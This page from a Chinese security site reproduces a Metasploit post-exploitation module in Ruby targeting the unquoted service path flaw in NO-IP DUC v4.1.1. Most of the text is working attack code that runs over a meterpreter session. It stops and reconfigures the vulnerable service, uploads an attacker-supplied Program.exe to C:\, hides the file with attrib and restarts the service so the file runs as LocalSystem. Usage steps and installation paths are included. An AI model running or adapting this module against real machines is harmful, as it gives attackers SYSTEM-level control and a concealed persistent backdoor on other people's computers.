NO-IP DUC v4.1.1 Unquoted Service Path Privilege Escalation Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

NO-IP DUC v4.1.1 Unquoted Service Path Privilege Escalation Exploit

来源：metasploit.com 作者：pedr0 发布时间：2016-10-31

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

# Exploit Title : NO-IP_privilege_scalation.rb - 'Unquoted Service Path Privilege Escalation'

# PDF Version : 4.1.1

# vuln Discover : Ehsan Hosseini

# Module Author : pedr0 Ubuntu [r00t-3xp10it]

# Tested on : Windows 7 Professional

# Software Link : http://www.noip.com/client/DUCSetup_v4_1_1.exe

#

# [ DESCRIPTION ]

# NO-IP DUC v4.1.1 installs a service with an unquoted service path.

# This enables a local privilege escalation vulnerability. To exploit this vulnerability,

# a local attacker can insert an executable file in the path of the service.

# Rebooting the system or restarting the service will run the malicious executable

# with elevated privileges.

#

# ---------------------------------------------------------------------------

# C:\>sc qc NoIPDUCService4

# [SC] QueryServiceConfig SUCCESS

# SERVICE_NAME: NoIPDUCService4

#         TYPE               : 10  WIN32_OWN_PROCESS

#         START_TYPE         : 2   AUTO_START

#         ERROR_CONTROL      : 1   NORMAL

#         BINARY_PATH_NAME   :  C:\Program Files\No-IP\ducservice.exe

#         LOAD_ORDER_GROUP   :

#         TAG                : 0

# DISPLAY_NAME : NO-IP DUC v4.1.1

#         DEPENDENCIES       :

# SERVICE_START_NAME : LocalSystem

# ---------------------------------------------------------------------------

# Using the BINARY_PATH_NAME listed above as an example, an executable named

# "Program.exe" could be placed in "C:\", and it would be executed as the

# Local System user next time the service was restarted.

#

# [ MODULE OPTIONS ]

# Input The session number to run this module on => set SESSION 3

# Input full path of Program.exe to be uploaded => set UPLOAD_PATH /root/Program.exe

# Check pdfcDispatcher service auto-start status? => set SERVICE_STATUS true

# use attrib to hidde your program.exe in target? => set HIDDEN_ATTRIB true

# HINT: to unset all options: msf post(NO-IP_privilege_scalation) > unset all

#

# [ PORT MODULE TO METASPLOIT DATABASE ]

# Kali linux COPY TO: /usr/share/metasploit-framework/modules/post/windows/escalate/NO-IP_privilege_scalation.rb

# Ubuntu linux COPY TO: /opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/NO-IP_privilege_scalation.rb

# Manually Path Search: root@kali:~# locate modules/post/windows/escalate

#

# [ LOAD/USE AUXILIARY ]

# meterpreter > background

# msf exploit(handler) > reload_all

# msf exploit(handler) > use post/windows/escalate/NO-IP_privilege_scalation

# msf post(NO-IP_privilege_scalation) > info

# msf post(NO-IP_privilege_scalation) > show options

# msf post(NO-IP_privilege_scalation) > show advanced options

# msf post(NO-IP_privilege_scalation) > set [option(s)]

# msf post(NO-IP_privilege_scalation) > exploit

##

# ----------------------------

# Module Dependencies/requires

# ----------------------------

require 'rex'

require 'msf/core'

require 'msf/core/post/common'

require 'msf/core/post/windows/priv'

# ----------------------------------

# Metasploit Class name and includes

# ----------------------------------

class MetasploitModule < Msf::Post

Rank = ExcellentRanking

include Msf::Post::Common

include Msf::Post::Windows::Priv

# -----------------------------------------

# Building Metasploit/Armitage info GUI/CLI

# -----------------------------------------

def initialize(info={})

super(update_info(info,

'Name' => 'NO-IP_DUC v4.1.1 - Unquoted Service Path Privilege Escalation',

'Description' => %q{

This post-exploitation module requires a meterpreter session to be able to upload/inject our Program.exe into NoIPDUCService4 service. NO-IP_DUC v4.1.1

installs a service with an unquoted service path. This enables a local privilege escalation vulnerability. To exploit this vulnerability, a local attacker can insert an executable file

in the path of the service. Rebooting the system or restarting the service will run the malicious executable with elevated privileges. "Warning: payload to be uploaded should be named as: Program.exe"

},

'License' => UNKNOWN_LICENSE,

'Author' =>

[

'Vuln discover: Ehsan Hosseini', # vulnerability discover

'Module Author: pedr0 Ubuntu [r00t-3xp10it]', # post-module author

'Special thanks: milton_barra|Chaitanya Haritash', # testing/debug module

],

'Version' => '$Revision: 1.0',

'DisclosureDate' => 'out 28 2016',

'Platform' => 'windows',

'Arch' => 'x86_x64',

'Privileged' => 'false',

'Targets' =>

[

# Tested againts windows 7 (32 bits) | XP SP1 (32 bits)

[ 'Windows XP', 'Windows VISTA', 'Windows 7', 'Windows 8', 'Windows 9', 'Windows 10' ]

],

'DefaultTarget' => '3', # default its to run againts windows 7 (32 bits)

'References' =>

[

[ 'URL', 'goo.gl/ew1IUm' ],

[ 'URL', 'goo.gl/U54297' ],

[ 'URL', 'http://sourceforge.net/users/peterubuntu10' ],

[ 'URL', 'http://sourceforge.net/projects/msf-auxiliarys/repository' ]

],

'DefaultOptions' =>

{

'SESSION' => '1', # Default its to run againts session 1

},

'SessionTypes' => [ 'meterpreter' ]

))

register_options(

[

OptString.new('SESSION', [ true, 'The session number to run this module on']),

OptString.new('UPLOAD_PATH', [ false, 'The full path of Program.exe to be uploaded']),

OptBool.new('SERVICE_STATUS', [ false, 'Check remote NoIPDUCService4 service settings?' , false]),

OptBool.new('HIDDEN_ATTRIB', [ false, 'Use Attrib command to Hide Program.exe?' , false])

], self.class)

end

# ----------------------------------------------

# Check for proper target Platform (win32|win64)

# ----------------------------------------------

def unsupported

session = client

sys = session.sys.config.sysinfo

print_warning("[ABORT]: Operative System => #{sys['OS']}")

print_error("Only windows systems are supported by this module...")

print_error("Please execute [info] for further information...")

print_line("")

raise Rex::Script::Completed

end

# -----------------------------------------------------------

# UPLOAD OUR EXECUTABLE INTO NoIPDUCService4 BINARY_PATH_NAME

# -----------------------------------------------------------

def ls_stage1

r=''

session = client

shell = "Program.exe"

payload = "C:\\Program.exe"

upath = datastore['UPLOAD_PATH']

bin_path = "C:\\Program Files\\No-IP\\ducservice.exe"

# check for proper config settings enter

# to prevent 'unset all' from deleting default options...

if datastore['UPLOAD_PATH'] == 'nil'

print_error("Options not configurated correctly...")

print_warning("Please set UPLOAD_PATH option!")

return nil

else

print_status("Deploying backdoor into target system!")

sleep(1.0)

end

# check if vulnerable service (executable) exists

if client.fs.file.exist?("#{bin_path}")

print_warning("NoIPDUCService4 service:found")

sleep(1.0)

print_good("Stoping NoIPDUCService4 service...")

# stop service to enable proper configuration

r = session.sys.process.execute("cmd.exe /c sc stop NoIPDUCService4", nil, {'Hidden' => true, 'Channelized' => true})

sleep(2.5)

print_good("Set service to auto-start with windows...")

# set service to auto-start with windows

r = session.sys.process.execute("cmd.exe /c sc config NoIPDUCService4 start= auto", nil, {'Hidden' => true, 'Channelized' => true})

sleep(1.0)

# upload our executable into temp foldder

print_good("Uploading payload to target system...")

client.fs.file.upload("%temp%\\#{shell}","#{upath}")

sleep(2.0)

# move payload to the rigth directory (unquoted service path)

print_good("moving payload to: #{payload}")

r = session.sys.process.execute("cmd.exe /c move /y %temp%\\#{shell} #{payload}", nil, {'Hidden' => true, 'Channelized' => true})

sleep(1.0)

# start remote service ...

print_good("Restarting pdfcDispatcher service...")

r = session.sys.process.execute("cmd.exe /c sc start NoIPDUCService4", nil, {'Hidden' => true, 'Channelized' => true})

sleep(2.0)

# task completed successefully...

print_warning("NoIPDUCService4 service [binary_path_name] backdoored successefuly!")

print_status("Setup one handler and Wait everytime that system restarts OR")

print_status("Setup one handler and restart NoIPDUCService4 service: sc start NoIPDUCService4")

print_line("")

else

print_error("NoIPDUCService4 service => NOT FOUND...")

print_warning("Target system does not appear to vulnerable to this")

print_warning("post-module has aborted all tasks in hands :( ")

print_line("")

end

# close channel when done

r.channel.close

r.close

# error exception funtion

rescue ::Exception => e

print_error("Error: #{e.class} #{e}")

end

# -------------------------------------------------

# USE ATTRIB COMMAND TO HIDDE PROGRAM.EXE (PAYLOAD)

# -------------------------------------------------

def ls_stage2

r=''

session = client

shell = "Program.exe"

payload = "C:\\Program.exe"

# check for proper config settings enter

# to prevent 'unset all' from deleting default options...

if datastore['HIDDEN_ATTRIB'] == 'nil'

print_error("Options not configurated correctly...")

print_warning("Please set HIDDEN_ATTRIB option!")

return nil

else

print_status("Using Attrib command to hide backdoor!")

sleep(1.0)

end

# check if backdoor.exe exist on target

if client.fs.file.exist?("#{payload}")

print_status("Backdoor #{shell} file:found")

sleep(1.0)

# change attributes of backdoor to hidde it from site...

r = session.sys.process.execute("cmd.exe /c attrib +h +s #{payload}", nil, {'Hidden' => true, 'Channelized' => true})

print_good(" Execute => attrib +h +s #{payload}")

sleep(2.0)

# diplay output to user

print_status("Our #{shell} its hidden from normal people!")

print_status("Just dont feed the black hacker within :( ")

print_warning("To revert attributes: attrib -h -s #{payload}")

print_line("")

# close channel when done

r.channel.close

r.close

else

print_error("#{payload} => NOT FOUND...")

print_warning("post-module has aborted all tasks in hands :( ")

print_line("")

end

# error exception funtion

rescue ::Exception => e

print_error("Error: #{e.class} #{e}")

end

# -------------------------------------------

# CHECK/DISPLAY pdfcDispatcher SERVICE STATUS

# -------------------------------------------

def ls_stage3

r=''

session = client

serv="NoIPDUCService4"

sysnfo = session.sys.config.sysinfo

# check for proper config settings enter

# to prevent 'unset all' from deleting default options...

if datastore['SERVICE_STATUS'] == 'nil'

print_error("Options not configurated correctly...")

print_warning("Please set SERVICE_STATUS option!")

return nil

else

print_status("Checking NoIPDUCService4 service settings!")

sleep(1.0)

end

print_warning("Reading service hive registry keys...")

# search in target regedit for WSearch auto-start service status

# Value:Start - dword: 2 - auto | 3 - manual | 4 - disabled

if registry_getvaldata("HKLM\\System\\CurrentControlSet\\services\\NoIPDUCService4","Start") == '2'

startup = "auto_start"

end

if registry_getvaldata("HKLM\\System\\CurrentControlSet\\services\\NoIPDUCService4","Start") == '3'

startup = "manual_start"

end

if registry_getvaldata("HKLM\\System\\CurrentControlSet\\services\\NoIPDUCService4","Start") == '4'

startup = "disabled_start"

else

startup = "unknow"

print_error("post-module cant define service auto_start status...")

print_warning("enter into a shell session and execute: sc qc NoIPDUCService4 status")

end

sleep(1.0)

# display pdfcDispatcher service current settings.

print_line("")

print_line(" :host => #{sysnfo['Computer']}")

print_line(" :service => #{serv}")

print_line(" :status => running")

print_line(" :startup => #{startup}")

print_line("")

# error exception funtion

rescue ::Exception => e

print_error("Error: #{e.class} #{e}")

end

# ------------------------------------------------

# MAIN DISPLAY WINDOWS (ALL MODULES - def run)

# Running sellected modules against session target

# ------------------------------------------------

def run

session = client

# Check for proper target Platform

unsupported if client.platform !~ /win32|win64/i

# Variable declarations (msf API calls)

sysnfo = session.sys.config.sysinfo

runtor = client.sys.config.getuid

runsession = client.session_host

directory = client.fs.dir.pwd

# Print banner and scan results on screen pdfcDispatcher

print_line(" +----------------------------------------------+")

print_line(" | NO-IP_DUCK - SERVICE PRIVILEGE ESCALATION |")

print_line(" | Author: Pedro Ubuntu [ r00t-3xp10it ] |")

print_line(" +----------------------------------------------+")

print_line("")

print_line(" Running on session : #{datastore['SESSION']}")

print_line(" Computer : #{sysnfo['Computer']}")

print_line(" Operative System : #{sysnfo['OS']}")

print_line(" Target IP addr : #{runsession}")

print_line(" Payload directory : #{directory}")

print_line(" Client UID : #{runtor}")

print_line("")

# elevate session privileges befor runing options

client.sys.config.getprivs.each do |priv|

end

# ------------------------------------

# Selected settings to run

# ------------------------------------

if datastore['UPLOAD_PATH']

ls_stage1

end

if datastore['HIDDEN_ATTRIB']

ls_stage2

end

if datastore['SERVICE_STATUS']

ls_stage3

end

[